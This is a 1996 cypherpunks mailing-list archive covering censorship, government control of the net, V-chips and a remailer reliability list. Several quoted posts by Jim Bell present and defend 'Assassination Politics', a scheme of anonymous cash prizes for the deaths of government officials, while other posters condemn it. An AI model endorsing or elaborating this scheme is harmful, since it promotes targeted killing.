>> Gov does have the right (in fact the duty) to regulate communications 
>> between citizens and non-citizens/sites in other lands
>[...and later...]
>> "...provide for the common defense"
>> "To regulate Commerce with foreign nations..."
>> "...or in adhering to their enemies, giving them Aid and Comfort."
>> 
>> There are the bytes - try reading them in context.
>
>Familiar phrases indeed. Now, it seems to me that the Commerce Clause and
>other Constitutional portions you cited could apply as well to 
>communications between two U.S. citizens inside the U.S. as they do to the
>citizen-alien communications you mentioned. Yet if I read you correctly
>earlier, you don't think the USG has the right to regulate those
>communications. Why the distinction ?


I suspect that Padgett's entire view of reality is built on quicksand.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 13 Feb 1996 01:13:51 +0800
To: cypherpunks@toad.com
Subject: The Emotional Killer (or out of the frying pan and into the electric chair?)
Message-ID: <199602120459.XAA22195@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


I want to write on the theme posted to the list in the message below where
J. Bell wrote "It is their ACTIONS that I feel violate my rights; that is
what justifies my seeking their deaths, should I choose to do so." 
 
First, one thing that marks the sane adult from the child and the floridly
psychotic adult is the sane adult's knowledge that "feelings" and "facts"
are two different things. 
 
It is one thing to "feel," as J. Bell or all of us might, that our rights
have been violated. 
 
It is another thing to maintain, as J. Bell uniquely appears to do, that
the "feeling" gives him the right to seek another person's death. 
 
This and other posts by J. Bell and other lib'bers lead me to believe that
their claimed interest in human freedom for everyone is little more than a
cover for a set of authoritarian expectations that they can do whatever
they want, free from any control, responsibility, or accountability. 
 
The argued centrality of J. Bell's "feelings" over other people's lives is
something that puts him in the god category. (Thankfully J. Bell is not one
of the dreaded tax collectors or "socialist statists.") 
 
Should J. Bell act on his "feelings" as he seems to think he has the right
to do, he may find that his "right" is little more than another "feeling"
not reflective of reality. 
 
He might also "feel" his rights are violated when a dreaded tax-collecting
socialist-statist called a cop detains him, another dreaded lawyer called a
prosecutor says nasty things about him in a court, a jury says "guilty,"
and another dreaded socialist-statist chowing-down-on-tax-money figure
called a judge says "death." This is also likely to produce an even greater
"feeling" that rights are violated immediately before another figure living
on tax money called an executioner pulls the switch. 
 
Death is sometimes Nature's way of telling us that our "feelings" were out
of sync with reality. 
 
But by then it is too late to do much about it. 
 
--tallpaul 
 
 
 
On Feb 10, 1996 17:41:30, 'jim bell <jimbell@pacifier.com>' wrote: 
 
> 
>At 08:13 PM 2/6/96 -0600, Jim Choate wrote: 
>> 
>>Forwarded message: 
> 
>>> A few months ago, I had a truly and quite literally "revolutionary" 
>>> idea, and I jokingly called it "Assassination Politics": I speculated
on 
>>> the question of whether an organization could be set up to _legally_ 
>>> announce either that it would be awarding a cash prize to somebody who 
>>> correctly "predicted" the death of one of a list of violators of 
>>> rights, usually either government employees, officeholders, or 
>>> appointees.  It could ask for anonymous contributions from the public, 
>>> and individuals would be able send those contributions using digital 
>>> cash. 
>>>  
>> 
>>If the intent is to motivate others to kill or otherwise harm others
simply 
>>because you don't agree with them or their actions is reprehensible and 
>>moraly or ethicaly undefensible. 
> 
>That's a misleading statement:  You said, "simply because..."    As should
 
>be abundantly clear from my other arguments, I wouldn't wish to see anyone
 
>killed "simply because"  of the fact I "don't agree with them."  It is
their  
>ACTIONS that I feel violate my rights; that is what  justifies my seeking 

>their deaths, should I choose to do so. 
> 
> 
>>> On the contrary; my speculation assumed that the "victim" is a 
>>> government employee, presumably one who is not merely taking a paycheck

>>> of stolen tax dollars, but also is guilty of extra violations of rights

>>> beyond this. (Government agents responsible for the Ruby Ridge incident

>>> and Waco come to mind.)  In receiving such money and in his various 
>>> acts, he violates the "Non-aggression Principle" (NAP) and thus, 
>>> presumably, any acts against him are not the initiation of force under 
>>> libertarian principles. 
>>>  
>> 
>>Every citizen of this country is a 'government employee' in one sense or 
>>another. 
> 
>That's about the weakest argument I've heard in a long time.  I'm amazed  
>that you weren't too embarrassed to post it to the list.  While I don't
know  
>precisely what your definition of the phrase "government employee" really 

>is, I "every citizen" is a "governement employee" then you must have a  
>REALLY weird definition of that. 
> 
>Somehow, I think that this is where  your argument fails, and it fails  
>miserably. 
> 
> 
>>By resorting to violence you are no better than the ones you proport to 
>>protect us against. 
> 
>Sorry, I disagree.  Now, I am certainly aware of the classic "Gandhi-type"
 
>total non-violence principle, but it turns out that very few people
actually  
>believe in that.  Most people seem to think that they are entitled to  
>protect themselves from violations of rights.  The fact that these  
>violations of rights may be done by "government employees" is at most  
>irrelevant, in that this doesn't justify it.  Anybody who feels entitled
to  
>use violence against a burglar, rapist, or murderer is correct; attempting
 
>to deny me the right to protect my property from GOVERNMENT people is, in 

>itself, a violation of my rights. 
> 
>Are you a statist? 
> 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 12 Feb 1996 14:03:39 +0800
To: cypherpunks@toad.com
Subject: Re: Strange Sounds of Silence
Message-ID: <199602120501.AAA22558@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 11, 1996 14:06:45, 'tcmay@got.net (Timothy C. May)' wrote (among
other things): 
 
 
> 
>I rarely understand the points "tallpaul" makes, but this one is
especially 
>confusing to me: 
> 
 
I'll close on this point. 
 
>At 7:59 PM 2/11/96, tallpaul wrote: 
> 
>>I do seem to observe strange sounds of silence from lib'bers on the 
>>cypherpunks list about the legislative body who passed the law, although 
>>they must know about the law since they blast the "libera;" to "socialist

>>statist" President who signed it. 
>> 
>>I seem to observe similar sounds of silence from people who get upset at 
>>ostensibly liberal Tipper Gore's godlike powers to implement, as a single

>>individual, some form of record labels while remaining silent about the 
>>conservative forces supporting Gingrich clustered around fundamentalist 
>>christianity who were calling for censorhip. 
> 
>As a card-carrying "lib'ber," it seems to me that I have written more than

>enough articles denouncing the CDA, making fun of it and Congress, etc.
And 
>so have numeous other "lib'bers" on this list, including (but not limited 
>to) Bill Stewart, Duncan Frissell, Jim Ray, Rich Graves, Sandy Sandfort, 
>Vince Cate, and others too numerous to mention. 
> 
>tallpaul must be reading a different list than I am reading if thinks
those 
>he dismisses as "lib'bers" (in his other posts, and this one) are somehow 
>in league with the Christian Right in supporting censorship. 
> 
 
I suspect that T.C. May and I are reading the same list just as I suspect
that Alan Pugh and I are living in the same country with the same shared
press corp. 
 
But I do not dismiss people as "lib'bers;" I merely call them that. I have
noticed that a large number of libertarians are fans of Rush Limbaugh and
chuckle a lot when Rush refers to women like Andrea Dworkin and her
supporters as lib'bers. I also find that the people opposed to Drowkin &
Co. are upset at her use of demagogic language, private dictionaries, and
the like. So am I, and 	 started long before Rush got his TV shows. I am,
however, equally (if not more upset) by what I perceive as similar
demagogic etc. behavior by many libertarians. 
 
In short, I do not seek "to dismiss" libertarians as "lib'bers." I am not a
magician and do not believe that complex issues go away through magical
chants (around which T.C. May has correctly written.) But I do call them
"lib'bers" much as Ruch Limbaugh uses the term in other areas. 
 
Do some people not like this? I imagine so. 
 
Do they have the right to complain? Absolutely, and I support their right
to so complain. 
 
Do they really have a right not to be styled "lib'bers?" No, I do not think
they have that right. 
 
Put another way, what is sauce for the goose cannot be slander for the
gander. 
 
I do not believe that all lib'bers are in league with the Christian right;
I am distrubed, however, by the large numbers of lib'bers who strangely
never mention the existence of the fundamentalists in the
ultra-conservative ultra-private-property camp. 
 
I am equally concerned with some leftists who consider every example of
authoritarian behavior as "fascism" as I am with 'ib'bers who lump everyone
who argues for social responsibility as a "socialst statist." One
difference I see is that I am willing to criticize both groups while many
(but not all) lib'bers are again strangely silent at least the "statist"
side of the equation. 
 
I am sorry that T.C. May frequently has problems understanding my posts. 
 
Both of us frequently use sarcasm and rhetorical hyperbole to make our
points. Witness his excellent _reductio ad absurdum_ post on warning labels
for every group around the orld who believes that his or her personal
folkways and mores are deserving of unique consideration. 
 
However, this in itself does not reduce the confusion. 
 
Let me then offer a possible compromise to reduce the confusion. 
 
If T.C. May makes a special effort to better identify sarcasm when people
such as myself use it and rhetorical hyperbole, I in turn will make a
special effort to be more sarcastic and more hyperbolic in posts containing
both. 
 
--tallpaul 
Internet sports fan: Go Big Red! Smash State! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 12 Feb 1996 17:21:16 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tltDh-0008xyC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:17 AM 2/11/96 -0600, Alex Strasheim wrote:
>> If Perry is REALLY sincere about objecting to the NON-crypto part of AsPol,
>> he should demonstrate this by writing notes which are focussing on the
>> crypto aspects, rather than just complaining.
>
>What's the proper procedure for complaining about the assasination part 
>of "AsPol"?

You could start out by saying something like, 

"I don't believe in the idea of self-defense:  People shouldn't defend 
themselves when they are attacked."


Is this what you really believe?

>In general, it doesn't bother me when the list goes "off topic" -- I don't
>read the stuff that doesn't interest me.  But when you start talking about
>violence, you have to expect that people are going to react negatively. 

Except that most of the people who would complain seem to make a convenient 
distinction about violence done by individuals in self-defense, and the 
threat of violence by government agencies.  In other words, statists don't 
want us to defend ourselves against government action.


>We have to say, "that's nuts" -- otherwise people will think that we're
>unbalanced sociopaths. 

Is it "nuts" to want to defend our own property?!?

>
>How much weight is Lotus going to give the opinions of a bunch of
>unbalanced sociopaths when they're thinking about making deal to gak those
>extra 24 bits?  Not much, I'll bet. 

If "AsPol" actually WORKS, Lotus won't have to "deal" to get "those extra 24 
bits."

Lotus should announce that they have heard of this new idea on CP, called 
"Assassination Politics," and have assigned a couple dozen programmers to 
implement it by July 1996.  They'd back (guarantee) the prizes for the first 
such organization, and they'd sell the software to others.  At that point, I 
think the resignations from government office would skyrocket.  


>I apologize in advance for not getting the joke if "AsPol", like Blacknet,
>is tongue in cheek.  I haven't been following the topic closely.
>I hope you're not serious.


You're obviously not very perceptive.  First, it's DEADLY SERIOUS.  But, 
moreover, I believe it's INEVITABLE.  It didn't even matter that a person 
named "Jim Bell" happened to write the essay; the system was coming no 
matter what happens.  Depending on how you look at it, I didn't "invent" 
anything; I merely "discovered" a reality that was on the way. I need do 
nothing to see the system implemented; it'll happen somewhere, sometime, and 
it'll spread inexorably throughout the world.  

Jim Bell

Klaatu Burada Nikto


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR71pfqHVDBboB2dAQGu0AP+KPFdgwOBRbovQNMji2XSEEPabAIVwFPs
mBtGNK3f+PEdVHQAWYwoFw+o9Wjd3nqWW1KZcN4/BHRa5X5s4EOe56tTmpHVbh4G
2a4V3zJrSOm5ocs9fNkYUOxc8ekwxCS9LeJ2dUke0QkfQ5s1GELW4zxB3I0eBVnC
GXV/Gv6b6kE=
=0HHg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 13 Feb 1996 04:49:42 +0800
To: cypherpunks@toad.com
Subject: Re: Attitudes toward the government...
Message-ID: <2.2.32.19960212083541.0090ee90@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 PM 2/11/96 -0800, Timothy C. May wrote:
>Jim Ray wrote:
>
>>"Americans hate the IRS, and if the only way they can get rid of it
>> is to elect somebody who is communicating directly with the Planet
>> Xorgon, then so be it." -- Dave Barry [on Steve Forbes]. 2/9/96
>
>Not just this, but another data point about the current sentiment about
>Washington: In a movie theater today there was a preview of the upcoming
>movie "Independence Day," showing a flying saucer hovering over the White
>House, then destroying it. The audience cheered and clapped.
>
>I'm not sure this would've happened in, say, the early 1950s.

I have seen similar responses when watching Washington D.C. get partially
destroyed in _Earth V.S. the Flying Saucers_.  Watching Ray Harryhousen
destroy the capitol and the washington monument is the best part of the movie.

>(However, like the early 1950s, the producers of this upatriotic drivel may
>have to answer to the House Un-American Activities Committee, to explain
>their Indecent portrayal.)

I expect it to be an "US V.S. Them" movie.  Lots of patriotism and the like
will be there.  (The title says alot about the film.)  It will hype the need
to be prepared for a "menace".  The message will be reinforced with a heavy
dosage of special effects and jingoism.  Standard hollywood fare.  I doubt
if we will see anything approching mild subversion form Hollywood anytime soon.

>(P.S. "Broken Arrow" was a fun flick. Sort of like "Fail Safe " on "Speed.")

Sounds like you spent your day doing the same thing i did...  It was quite
worthwhile.  (But then, John Woo films usually are.)  I also found
_Hardboiled_ subtitled and letterboxed a few days ago.  Another great Woo film.

OBCypherpunks noise:  I am amazed I have not yet seen a mention of the
animated Spy V.S. Spy cartoons running on Mad TV.  One of the best parts of
the show.  (Except for the Triple XXX files from the last episode.)


---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 13 Feb 1996 01:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: China
In-Reply-To: <199602120410.UAA15696@netcom7.netcom.com>
Message-ID: <Bs96iD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> Back in the really dark ages, we used acoustic couplers (300 b/s max) which
> held a telephone handset, so there was no direct connection to the
> telephone lines.  The phone company asserted that they were also illegal,
> but their argument was kind of weak!

I used acoustic couplers. My first modem was 110 bps, and when we got 300 bps,
it seems so fast in comparison... And then 1200 bps seemed even faster.
Acoustic couplers are still useful if you travel to places where there are
no rj11 connectors.
I recall that AT&T's argument against connecting any kind of user equipment to
their lines was that it might electrocute one of their workers.
I recall that recently in Germany one could not have a modem without some
kind of licence from DT - has it changed?
Personal computers, modems, and phone lines are ubiquitous in the U.S. and
most other developed countries. I suspect that modems may be rare enough in
China for the government to regulate their possession, using any silly excuse.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 13 Feb 1996 01:12:58 +0800
To: vince@offshore.com.ai>
Subject: Re: [NOISY] Re: New Internet Privacy Provider - Press Release
In-Reply-To: <Pine.LNX.3.91.960210231501.1339B-100000@online.offshore.com.ai>
Message-ID: <8l7hYdG00YUvF3yaIP@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 10-Feb-96 Re: [NOISY] Re: New
Interne.. by Vincent Cate@offshore.co 
> It is clearly not for everyone.  However, someone running a
> business over the net should really think about how much they pay
> in taxes to see if forming an offshore corporation and getting an
> offshore web-site makes sense. 
>  
> Basically if a net business is paying more in taxes than the extra
> costs to operate an offshore corporation it can pay to relocate. 
> The operating costs are the web-site/email $1,200/year and about
> $500/year to maintain a corporation (~$1,000 first year).  So even
> a small business can justify the move.

Thanks, Vincent, for a well-reasoned reply.

While I'm not likely to sign up in the near future -- unless the
situation here worsens dramatically -- I wish you well with your
attempts to solicit businesses as customers. Good luck!

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 12 Feb 1996 15:27:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Regulation of citizen-alien communications
In-Reply-To: <960211203035.2021bd9f@hobbes.orl.mmc.com>
Message-ID: <199602120621.BAA00541@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Padgett writes:
> Gov does have the right (in fact the duty) to regulate communications 
> between citizens and non-citizens/sites in other lands
[...and later...]
> "...provide for the common defense"
> "To regulate Commerce with foreign nations..."
> "...or in adhering to their enemies, giving them Aid and Comfort."
> 
> There are the bytes - try reading them in context.

Familiar phrases indeed. Now, it seems to me that the Commerce Clause and
other Constitutional portions you cited could apply as well to 
communications between two U.S. citizens inside the U.S. as they do to the
citizen-alien communications you mentioned. Yet if I read you correctly
earlier, you don't think the USG has the right to regulate those
communications. Why the distinction ?

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 12 Feb 1996 15:50:25 +0800
To: strata@virtual.net
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <CMM.0.90.2.824072084.strata@virtual-city.virtual.net>
Message-ID: <9602120707.AA08292@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Congratulations.,.  most of the polemics about the overweaning
power of the net, particularly in such communities as cypherpunks are
touchingly nieve tripe.   You have spoken the truth - and the hard words
need to be heard and  understood before it is too late.

	A lot of people forget the basic truth that the net is based
almost entirely on physical communications facilities owned for the most
part by huge corperations that have deeply incestuous relationships with
the political power structure and very little interest in preserving the
self important dreams of a few members of a self selected net "elite".  
If ordered to pull the plug they will, and cyberspace as we know it will
evaporate overnight.

	And there is essentially no possibility of practical alternative
communications facilities becoming available - aside from the titanic
capital costs of creating such, most of the resources required such as
radio spectrum, orbital slots and rights of way are tightly controlled by
the entrenched corperations that operate the present facilities. 

	And the communications network infrastructure in the US has long
since outgrown its earlier days of comparative electronic anonymity - if
the government decides it has to control and or eliminate a network or
host it does not like it will be damned hard to construct one that
cannot be detected, mapped  and tracked down to physical people typing
on physical keyboards at the end of physical wires and fibers.  Crypto
may help until it is so regulated and controlled that the mere act of
possessing uncontrolled crypto software or hardware, or sending,
receiving or even just storing on disk a message that the government
cannot read is ipso facto justification for a long mandatory jail term -
(and that day is  coming). Remailers may help until anonymous
forwarding of electronic messages of any kind to third parties for the
purpose of concealing the sender or recipients true identity is a
serious crime except for certain very narrowly defined exceptions such
as otherwise legal anonymous political speech and such things as
legitimate anonymous self help groups. International sites may help
until the government decides that international traffic to rogue states
is something that it historically has had control of and can regulate
(witness the embargo for many years on telephone traffic to Cuba),
But it seems very clear as long as the government  has ultimate
control of the communications facilities used to send the messages the
government can and will control their passage if it feels it has to.

	Unfettered, uncontrolled, uncensored  net access to anything
like  the current wide cross section of the great washed, upper income,
upper education sector of the population reached by the current
Internet is a short term historical accident - there are too many
powerful groups challenged and threatened by such for this period of 100
flowers to last. 

	And, alas, the overbroad controls put in place by scared
politicians in response to the "excesses" of this period of freedom  may
well have the effect of making it completely impossible to create
another academic, fringe, elite, intellectual, anarchic  Internet ... it
may well become seriously illegal to operate any free electronic forum
of wide scope without rigorous pre-publication mechanisms in place to
eliminate illegal information, pornography, stolen intellectual
property, improper racist, sexist, or nationalistic sentiments,
blasphemy, seditious speech, profantity, concealment of true traceable
identity, impersonation of another, and quite possibly anything that
could be construed as defaming the character of a person or institution.

	I'm enough of a coward to believe that perhaps we should concede
the greater public Internet to the commercial interests that seek to
turn it into a vast shopping mall and let them control speech, regulate
content and license speakers provided that it still is possible for
private, academic, fringe, full free speech electronic networks to exist
for at least some of the intelligensia. And I'm afraid that may be the
real bargain we face....

						A defeated pessimist,
 						die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 12 Feb 1996 19:50:53 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602121136.GAA08106@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


(I agree with nearly everything in Strata's "Refutation" essay. In 
particular, I find his comments on the net.pundits' hypocrisy about net.bias
and prejudice to be extremely accurate.)

James Donald writes:
[...various points about "cohesion"...]
> In an all out knock down battle between a particular government and the
> internet, in a state where a substantial proportion of the middle class
> was on the internet, the government would be in serious danger of 
> evaporating like a jellyfish in the sunshine.

I'm afraid I'm not willing to take this on faith. Strata made some good
observations about the tangible vulnerability of the net-as-we-know-it to
government intervention. If you'd like to try to rebut some of his arguments
a bit more specifically, I'd be very interested in reading about it.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 12 Feb 1996 23:30:53 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199602121450.GAA09500@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 12 Feb 96 6:49:07 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         ######*#*###      :31  99.98%
alumni   hal@alumni.caltech.edu           --*###*#-###     9:13  99.96%
gondolin mix@remail.gondolin.org          ----..--__.  18:30:36  99.53%
gondonym alias@nym.gondolin.org            *--..--__-  19:44:38  99.50%
mix      mixmaster@remail.obscura.com     ----+-+..--   3:57:36  99.47%
nymrod   nymrod@nym.alias.net              ***+****#*      7:14  99.46%
c2       remail@c2.org                    ** ****+***     17:56  99.41%
flame    remailer@flame.alias.net          -++-++++++     56:24  98.99%
hroller  hroller@c2.org                   ##-##** #.#      7:26  98.64%
alpha    alias@alpha.c2.org               **-*******       6:39  98.64%
vishnu   mixmaster@vishnu.alias.net       *--+----***     31:13  98.32%
pamphlet pamphlet@idiom.com                ++++++++++     42:53  98.25%
ecafe    cpunk@remail.ecafe.org            ##*###*###       :36  97.66%
hacktic  remailer@utopia.hacktic.nl        **********      7:57  95.59%
extropia remail@extropia.wimsey.com       ---_..--.    20:05:32  93.23%
replay   remailer@replay.com              ****  *+***      7:00  93.03%
rahul    homer@rahul.net                  ***#+# ***##     1:58  99.76%
penet    anon@anon.penet.fi                __.-_  . *  30:35:19  87.17%
shinobi  remailer@shinobi.alias.net        *#-#   ##*   1:22:28  86.88%
ford     remailer@bi-node.zerberus.de     +..-+-+       4:33:06  57.50%
tjava    remailer@tjava.com                                2:46  -3.30%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 12 Feb 1996 21:00:03 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602121222.HAA26127@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Parents had that ability before.  Cable boxes have a "perental control key"
> on the side that enables them to lock out "offensive" channels.  It works
> quite well and is fairly hard for the kidlets to defeat.  (I used it to
> lockout the religious stations and home shopping channels.)

When I was a kid some friends down the street knew how to unlock the 
Channel 100 XXX movies with a paper clip.  A V-chip would hopefully 
be more sophisticated, but then again, so are today's kids...

> The "V-Chip" debate is a mirror of the one that occured when the cable
> channels were starting to become popular.  There was a big hue and cry about
> kids getting to the "naughty" channels without parent concent.  Seems most
> people do not even learn how the lockouts work.  (And are too lazy to learn.)

You should check out your nearest H/P BBS or ftp-site...

> You have to remember that most of the people arguing for TV filters are
> looking for a way to make the "offensive" stuff go away for good.  (Either
[..]

A very good point.  One that makes me wary of V-Chips...

 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 12 Feb 1996 21:14:48 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602121222.HAA26137@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> One thing the V-Chip gives us is the argument:  Now that parents have the
> ability to control what their children watch, the government should turn
> responsibility over to them and butt out.

We should turn the argument into something about how the V-Chip is a 
crappy idea and go from there to a system of filtering which can be 
used negatively (to filter out offensive or lame programming, 
commercials even) and positively (notify when a program comes on).

 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 12 Feb 1996 21:05:31 +0800
To: cypherpunks@toad.com
Subject: Odd rounds in Blowfish
Message-ID: <199602121225.HAA09222@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




[ This is an article that I just posted to sci.crypt ]

In describing Blowfish Bruce Schneier mentioned that it achieves avalanche
